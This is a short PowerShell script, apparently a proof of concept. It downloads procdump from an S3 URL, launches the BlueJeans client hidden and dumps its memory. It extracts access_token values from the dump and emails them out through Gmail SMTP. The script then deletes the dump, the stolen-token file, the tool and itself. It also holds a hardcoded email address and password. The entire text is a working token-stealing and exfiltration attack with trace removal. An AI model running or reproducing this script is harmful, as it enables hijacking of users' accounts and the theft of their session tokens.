powerhell

#https://s3.amazonaws.com/wifi101/procdump.exe
$Client = New-Object System.Net.WebClient
Start-Sleep -m 2000
$Client.DownloadFile('https://s3.amazonaws.com/wifi101/procdump.exe', "$Env:USERPROFILE\Documents\procdump.exe")
Start-Sleep -m 2000
Start-Process "$Env:USERPROFILE\AppData\Local\BlueJeans\BlueJeans.exe" -WorkingDirectory "$Env:USERPROFILE\Documents\" -WindowStyle Hidden
Start-Sleep -m 8000
$app = "$Env:USERPROFILE\Documents\procdump.exe"
$programid="BlueJeans.exe"
$argument1 = '-ma'
$argument2 = "$Env:USERPROFILE\Documents\"
$argument3='-accepteula'
$argument4='-o'
$argument5="$Env:USERPROFILE\Documents\bluejeans.dmp"
& $app $argument1 $programid $argument3 $argument4 $argument5
$input_path = "$Env:USERPROFILE\Documents\bluejeans.dmp"
$output_file = "$Env:USERPROFILE\Documents\hack.txt"
$regex ='\baccess_token\=(.*)\b'
select-string -Path $input_path -Pattern $regex -AllMatches | % { $_.Matches } | % { $_.Value } > $output_file
$smtpClient = new-object system.net.mail.smtpClient
$smtpClient.Host = 'smtp.gmail.com'
$smtpClient.Port = 587
$smtpClient.EnableSsl = $true
$SMTPClient.Credentials = New-Object System.Net.NetworkCredential("allwindaniel007@gmail.com", "Lenovo@345");
$emailfrom = "allwindaniel007@gmail.com"
$emailto = "allwindaniel007@gmail.com"
$subject = "Bluejeans Acces Tokens"
$body = "Captured Acces Tokens - POC"
$emailMessage = New-Object System.Net.Mail.MailMessage
$emailMessage.From = $EmailFrom
$emailMessage.To.Add($EmailTo)
$emailMessage.Subject = $Subject
$emailMessage.Body = $Body
$emailMessage.Attachments.Add("$Env:USERPROFILE\Documents\hack.txt")
$SMTPClient.Send($emailMessage)
Start-Sleep -m 3000
Stop-Process -processname BlueJeans
Start-Sleep -m 8000
Remove-Item "$Env:USERPROFILE\Documents\hack.txt","$Env:USERPROFILE\Documents\bluejeans.dmp","$Env:USERPROFILE\Documents\procdump.exe","$Env:USERPROFILE\Documents\hack.ps1"